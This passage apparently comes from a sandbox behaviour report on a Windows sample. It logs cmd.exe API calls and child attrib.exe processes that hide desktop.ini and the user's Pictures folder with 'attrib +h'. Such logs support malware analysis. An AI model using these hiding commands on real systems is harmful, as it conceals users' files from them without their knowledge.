lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.954] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0143.049] _close (_FileHandle=4) returned 0 [0143.049] FindNextFileW (in: hFindFile=0x30e5e8, lpFindFileData=0x20ee20 | out: lpFindFileData=0x20ee20) returned 0 [0143.049] GetLastError () returned 0x12 [0143.049] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.053] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0143.055] _close (_FileHandle=3) returned 0 [0143.055] GetConsoleTitleW (in: lpConsoleTitle=0x20f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.055] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.056] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.056] GetLastError () returned 0x2 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.056] GetLastError () returned 0x2 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.056] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.056] GetLastError () returned 0x2 [0143.057] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.057] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.057] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.057] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.057] GetConsoleTitleW (in: lpConsoleTitle=0x20efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.057] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef3c | out: lpAttributeList=0x20ee74, lpSize=0x20ef3c) returned 1 [0143.057] UpdateProcThreadAttribute (in: lpAttributeList=0x20ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ee74, lpPreviousValue=0x0) returned 1 [0143.057] GetStartupInfoW (in: lpStartupInfo=0x20ee30 | out: lpStartupInfo=0x20ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0143.057] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.057] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessInformation=0x20ef1c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x308, dwThreadId=0x894)) returned 1 [0143.059] CloseHandle (hObject=0x50) returned 1 [0143.059] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.059] GetEnvironmentStringsW () returned 0x312c70* [0143.059] FreeEnvironmentStringsW (penv=0x312c70) returned 1 [0143.059] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0143.187] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20ee10 | out: lpExitCode=0x20ee10*=0x0) returned 1 [0143.187] CloseHandle (hObject=0x4c) returned 1 [0143.187] _vsnwprintf (in: _Buffer=0x20ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ee1c | out: _Buffer="00000000") returned 8 [0143.187] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0143.187] GetEnvironmentStringsW () returned 0x312c70* [0143.187] FreeEnvironmentStringsW (penv=0x312c70) returned 1 [0143.187] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0143.187] GetEnvironmentStringsW () returned 0x312c70* [0143.187] FreeEnvironmentStringsW (penv=0x312c70) returned 1 [0143.187] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ee74 | out: lpAttributeList=0x20ee74) [0143.187] GetConsoleTitleW (in: lpConsoleTitle=0x20f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.188] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.188] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.188] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.188] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.188] GetLastError () returned 0x2 [0143.188] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.188] GetLastError () returned 0x2 [0143.188] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.188] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0xffffffff [0143.189] GetLastError () returned 0x2 [0143.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eaf4) returned 0x30e5e8 [0143.189] FindClose (in: hFindFile=0x30e5e8 | out: hFindFile=0x30e5e8) returned 1 [0143.189] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.189] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.189] GetConsoleTitleW (in: lpConsoleTitle=0x20efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.189] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef3c | out: lpAttributeList=0x20ee74, lpSize=0x20ef3c) returned 1 [0143.189] UpdateProcThreadAttribute (in: lpAttributeList=0x20ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ee74, lpPreviousValue=0x0) returned 1 [0143.189] GetStartupInfoW (in: lpStartupInfo=0x20ee30 | out: lpStartupInfo=0x20ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0143.189] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.189] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessInformation=0x20ef1c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x7dc, dwThreadId=0x7b8)) returned 1 [0143.191] CloseHandle (hObject=0x4c) returned 1 [0143.191] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.191] GetEnvironmentStringsW () returned 0x313628* [0143.191] FreeEnvironmentStringsW (penv=0x313628) returned 1 [0143.191] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0143.258] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20ee10 | out: lpExitCode=0x20ee10*=0x0) returned 1 [0143.258] CloseHandle (hObject=0x50) returned 1 [0143.258] _vsnwprintf (in: _Buffer=0x20ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ee1c | out: _Buffer="00000000") returned 8 [0143.258] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0143.259] GetEnvironmentStringsW () returned 0x313628* [0143.259] FreeEnvironmentStringsW (penv=0x313628) returned 1 [0143.259] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0143.259] GetEnvironmentStringsW () returned 0x313628* [0143.259] FreeEnvironmentStringsW (penv=0x313628) returned 1 [0143.259] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ee74 | out: lpAttributeList=0x20ee74) [0143.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.259] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.259] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.259] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.259] SetConsoleInputExeNameW () returned 0x1 [0143.259] GetConsoleOutputCP () returned 0x1b5 [0143.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.260] exit (_Code=0) Process: id = "182" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16de0" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0xf90" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16403 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16404 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16405 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16406 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16407 start_va = 0xcc0000 end_va = 0xcc6fff entry_point = 0xcc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16408 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16409 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16410 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16411 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16412 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16413 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16414 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16415 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16416 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 16417 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 16418 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16419 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16420 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16421 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16422 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16423 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16424 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16425 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16426 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16427 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16428 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16429 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16430 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 16431 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16432 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 239 os_tid = 0x8b4 Process: id = "183" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b80" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0xf90" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16486 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16487 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16488 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16489 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 16490 start_va = 0xbc0000 end_va = 0xbc6fff entry_point = 0xbc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16491 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16492 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16493 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16494 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 16495 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16496 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16497 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16498 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16499 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 16500 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 16501 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16502 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16503 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16504 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16505 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16506 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16507 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16508 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16509 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16510 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16511 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16512 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16513 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 16514 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16515 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 240 os_tid = 0x894 Process: id = "184" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b80" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0xf90" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM 